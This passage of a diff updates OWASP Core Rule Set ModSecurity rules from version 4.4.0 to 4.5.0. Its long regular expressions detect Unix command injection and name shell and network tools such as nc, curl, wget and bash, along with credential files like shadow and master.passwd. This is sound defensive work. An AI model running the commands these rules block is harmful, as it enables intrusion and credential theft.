)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\-\.0-9A-Z_a-z][\"'\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\*\-0-9\?@_a-\{]*)?\x5c?)+[\s\x0b&,<>\|]).*|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4|[\s\x0b&\),<>\|].*))|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)\b" \ +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\-\.0-9A-Z_a-z][\"'\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\*\-0-9\?@_a-\{]*)?\x5c?)+[\s\x0b&,<>\|]).*|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4|[\s\x0b&\),<>\|].*))|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)\b" \ "id:932230,\ phase:2,\ block,\ @@ -25,11 +25,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\x0b&\)<>\|]|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|nsible|pt(?:-get|itude[\s\x0b&\)<>\|])|r(?:ch[\s\x0b&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\x0b&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab))|s(?:cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:psfilter|rl[\s\x0b&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\x0b&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\x0b&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r)))|f(?:acter|(?:etch|lock|unction)[\s\x0b&\)<>\|]|grep|i(?:le(?:[\s\x0b&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\x0b&\)<>\|])|o(?:ld[\s\x0b&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\x0b&\)<>\|]|core|e(?:ni(?:e[\s\x0b&\)<>\|]|soimage)|tfacl[\s\x0b&\)<>\|])|hci|i(?:mp[\s\x0b&\)<>\|]|nsh)|r(?:ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|dconfig|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\x0b&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ke[\s\x0b&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\x0b&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\x0b&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\x0b&\)<>\|]|map|o(?:de[\s\x0b&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cman|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|(?:ft|gre)p|hp(?:-cgi|[57])|i(?:(?:co|ng)[\s\x0b&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\x0b&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\x0b&\)<>\|]|shd)|wd\.db|y(?:thon[^\s\x0b]|3?versions))|r(?:ak(?:e[\s\x0b&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\x0b&\)<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\x0b&\)<>\|]|user)|nano|oute[\s\x0b&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|nap)[\s\x0b&\)<>\|]|diff|e(?:(?:lf|rvice)[\s\x0b&\)<>\|]|ndmail|t(?:arch|env|facl[\s\x0b&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\x0b&\)<>\|]|u(?:f|tdown[\s\x0b&\)<>\|]))|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:datectl|out[\s\x0b&\)<>\|])|mux|ouch[\s\x0b&\)<>\|]|r(?:aceroute6?|off)|shark)|